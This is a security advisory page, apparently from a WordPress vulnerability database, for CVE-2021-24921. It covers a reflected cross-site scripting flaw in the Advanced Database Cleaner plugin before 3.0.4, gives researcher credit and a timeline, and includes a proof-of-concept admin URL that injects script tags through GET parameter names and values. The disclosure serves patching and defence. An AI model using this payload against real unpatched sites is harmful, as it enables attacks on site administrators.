Advanced Database Cleaner < 3.0.4 – Reflected Cross-Site Scripting | CVE 2021-24921 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape $_GET keys and values before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues

Proof of Concept

https://example.com/wp-admin/admin.php?page=advanced_db_cleaner&aDBc_tab=options&aDBc_cat=all&'><script>alert(/XSS-key/)</script>=<script>alert(/XSS-value/)</script>

Affects Plugins

advanced-database-cleaner

Fixed in 3.0.4

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website

https://blog.szfszf.top

Submitter twitter

Verified

Yes

WPVDB ID

43ab0997-4d15-4ff7-af41-7b528b0ba3c7

Timeline

Publicly Published

2022-01-24 (about 2 years ago)

Added

2022-01-24 (about 2 years ago)

Last Updated

2022-09-26 (about 1 years ago)

Other

Published

Title

Published

2024-05-07

Title

Custom Field Suite < 2.6.6 - Authenticated (Admin+) Stored Cross-Site Scripting

Published

2023-01-11

Title

GamiPress – Vimeo integration < 1.0.9 - Contributor+ Stored XSS

Published

2021-07-27

Title

Favicon by RealFaviconGenerator < 1.3.22 - Reflected Cross-Site Scripting (XSS)

Published

2023-04-18

Title

Panorama - WordPress Project Management < 1.5.1 - Admin+ Stored XSS

Published

2023-12-05

Title

Calculated Fields Form < 1.2.41 - Authenticated (Admin+) Stored Cross-Site Scripting